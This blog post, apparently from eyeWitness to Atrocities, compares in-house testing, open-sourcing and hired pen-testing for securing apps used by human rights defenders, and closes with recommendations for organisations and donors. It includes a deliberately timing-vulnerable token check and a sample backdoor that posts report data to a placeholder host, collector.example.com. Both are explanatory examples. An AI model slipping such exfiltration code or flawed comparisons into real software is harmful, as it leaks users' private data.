Making public interest technology safer for human rights defenders

Wendy Betts
Raquel Vazquez Llorente

Options for testing the security of an app’s code

Wendy Betts is the Director of eyeWitness to Atrocities, an organisation set up by the International Bar Association that combines legal and technological expertise to aid investigations and promote accountability for international crimes. Raquel Vazquez Llorente is the Senior Legal Advisor of eyeWitness.

Attacks against human rights defenders have been on the rise in recent years, in both the physical and digital domains. While no device or account is unhackable, good cyber security practices, like the tactics proposed in the Digital First Aid Kit or Surveillance Self-Defense, can at least make penetrating a system more resource-intensive. However, even strong cyber security hygiene will be less effective, or even futile, if the tools used by human rights defenders contain code vulnerabilities that can be weaponised.

This blog post offers some options to organisations creating public interest technology that want to ensure the software they develop undergoes a rigorous security audit. We explain the advantages and disadvantages of each approach and highlight some of the limitations faced by organisations with small budgets or teams. We conclude with recommendations to donors and developers to push for stronger and more accessible security practices when building tools for civil society.

A note to human rights defenders using apps

Regardless of the option chosen by the organisation behind the tool, it is also key that users of public interest technology understand each of the approaches we outline below. Above all, users should appreciate the strengths and weaknesses of each alternative to determine what fits their risk profile.

This post does not cover cyber security practices that app users and their organisations should consider. Organisations should think about their security in a broad sense, ensuring that team members have basic security skills, shared infrastructure is scrutinised, and resources are dedicated to security. For groups who need support thinking through these kinds of challenges, The Engine Room’s light-touch support might be a good resource.

In-house testing

All systems have vulnerabilities, but many of them may not be obvious. Some vulnerabilities can expose the system to serious harm even if, from the user’s perspective, the app works without a hitch. Commercial companies often have their own internal cyber security teams whose job is to find flaws in the code and patch them before a hacker can exploit them.
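
To make this concrete, here is a minimal, hypothetical Python sketch of the kind of subtle flaw a security review hunts for (the function names and secret value are invented for illustration). The vulnerable version passes every functional test, yet leaks information through timing differences.

```python
import hmac

SECRET_TOKEN = "s3cr3t-value-from-config"  # hypothetical secret


def check_token_vulnerable(submitted: str) -> bool:
    # Looks correct and behaves correctly in ordinary use, but `==`
    # returns as soon as the first differing character is found, so an
    # attacker who can measure response times may be able to recover
    # the token one character at a time.
    return submitted == SECRET_TOKEN


def check_token_safer(submitted: str) -> bool:
    # hmac.compare_digest compares the full inputs in constant time,
    # closing the timing side channel while behaving identically from
    # the user's perspective.
    return hmac.compare_digest(submitted.encode(), SECRET_TOKEN.encode())
```

Both functions return the same answers for the same inputs, which is precisely why flaws like this survive ordinary functional testing and need a dedicated security review to catch.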

Establishing an internal unit gives direct control to the developers, but assembling the right team is resource-intensive and costly. As such, in-house testing is often not feasible for smaller or less well-resourced organisations developing public interest technology. An alternative option is to outsource these services, for instance by opening the code or contracting expertise.

Opening your code to the public

An organisation may opt to open the code to the public for analysis. This can be done, for example, by uploading it to GitHub and sharing it for review. This is the most affordable option and can be a good way of obtaining external opinions. When the source code is open, anyone can inspect it and search for vulnerabilities—such as a backdoor that may be sending private information to a third party. If someone identifies a vulnerability, the finding can also protect other NGOs in the human rights community, who normally do not have the capacity or resources to conduct such analysis, by alerting them before they start using the software.
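
As a hypothetical illustration of what open review can catch, consider this Python sketch of a backdoor of the kind mentioned above (the helper name and URL are invented). The app behaves exactly as documented, but the source reveals that it also ships the data elsewhere.

```python
import json
import urllib.request


def save_report(report: dict, path: str) -> None:
    # Documented behaviour: store the report locally.
    with open(path, "w") as f:
        json.dump(report, f)

    # The backdoor: the same data is quietly posted to a third-party
    # server. Nothing in the app's interface hints at this, but anyone
    # reading the published source code can spot the extra request.
    request = urllib.request.Request(
        "https://collector.example.com/upload",  # hypothetical third party
        data=json.dumps(report).encode(),
        headers={"Content-Type": "application/json"},
    )
    urllib.request.urlopen(request)
```

Network traffic analysis might also reveal behaviour like this, but with the source open, a reviewer can find it simply by reading the code.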

However, both the app developers and users will still have to assess the skills of whoever audits the code, and will have no control over the thoroughness, quality or frequency of the testing—or whether the code is tested at all. Most of the apps created for human rights defenders and other small communities are niche, and their use is restricted to a few thousand users. Organisations can increase the chance of having their code tested by reaching out to supporters, peers and open source communities. Still, this option may not attract the attention of cyber security experts, who tend to evaluate software or apps with a wider reach.

Bounty-type programs might incentivise cyber security experts from other communities to audit the code. The “bounty” (or reward for reviewing the code) can be a token of appreciation, like a t-shirt or public recognition. However, the success of this approach will depend on the reputation of the organisation or its tool, and it can be hard to attract skilful testing and reporting, particularly if there is no monetary reward.

Hiring external expertise

Alternatively, organisations can turn to a specialised company for a review or audit of the code. For organisations developing apps, hiring penetration testers (also called pen-testers or ethical hackers) is an effective way of testing the strength of the code. A pen-test is a deliberate, authorised attack on a computer system, network, or application to reveal vulnerabilities that could lead to a security breach or the disclosure of sensitive data. Generally, the results are captured in a report with insights that can improve the security of the system evaluated.

Contracting a company with a solid reputation can ensure audits that are thorough and as frequent as needed, but organisations should bear in mind that the fees can be high. Unlike other sectors, such as the legal profession, IT security has not yet developed a culture of pro bono work. Even with an NGO discount, ethical hacking services can cost a few thousand US dollars for a consultation, so it’s important to do thorough due diligence before contracting an external company. This can include checking the certifications the company holds, talking to previous customers, and asking about their internal security (since they will store highly sensitive data detailing the organisation’s vulnerabilities). It is also important to ask what types of pen-testing the company conducts, how they will transmit the results, and whether they offer support for implementing any corrective actions needed.

When contracting external expertise, organisations may consider publishing the findings. Before doing so, it’s important to check the terms of the contract, as some companies may not allow publication of the full report. While releasing the document, or part of it, can be beneficial to users, security audit reports can be quite technical and difficult to understand. In practice, users may end up relying on your organisation’s word about the soundness of the code, or on the pen-tester’s reputation.

As we’ve discussed above, many routes to a security audit can be beyond the reach of small or under-resourced organisations. Addressing these limitations is the responsibility not just of the organisations themselves, but also of others within the ecosystem. Below are some recommendations to make security testing more widely accessible.

Recommendations for civil society organisations developing public interest technology, in particular tools for human rights defenders and other communities at risk

  1. Add security costs to budget planning: Where possible, include in funding proposals sufficient budget to maintain the security of tech tools over time, whether that’s adding budget for an in-house team or for hiring external expertise such as pen-testers.
  2. Contribute to culture-building: Advocate for a stronger cyber security pro bono culture to make the existing options more accessible to organisations that may not otherwise have access to that expertise.
  3. Develop a community of practice: Push for creative solutions, for instance by helping set up working groups or partnerships with cyber security experts, academia or the private sector that can help evaluate the security of tools.

Recommendations to donors funding public interest technology

The responsibility for building secure non-profit tools does not lie only with NGOs and civil society, but also with funders. To contribute to stronger tools, funders can:

  1. Make space for conversations with grantees about security and testing: Urge organisations to understand what cyber security testing options are available to them before they start developing a tool.
  2. Encourage and approve flexible and sustainable budgets: Allow budgets that can flexibly and realistically maintain the security of tech tools, both upon their creation and over time. Flexible funding gives grantees the room to direct resources to security needs as they arise.
  3. Contribute to culture-building: Foster a stronger cyber security pro bono culture, or emphasise the role of cyber security experts who can audit code in public interest tech.
  4. Back creative solutions: Recognise the work that grantees are doing in generating momentum around security and play a facilitating role where possible. For example, consider setting up expert working groups that can offer guidance on the cyber audit options that are available to smaller organisations; or spearhead cyber security partnerships between non-profits developing software, academia and the private sector to help evaluate the security of tools.
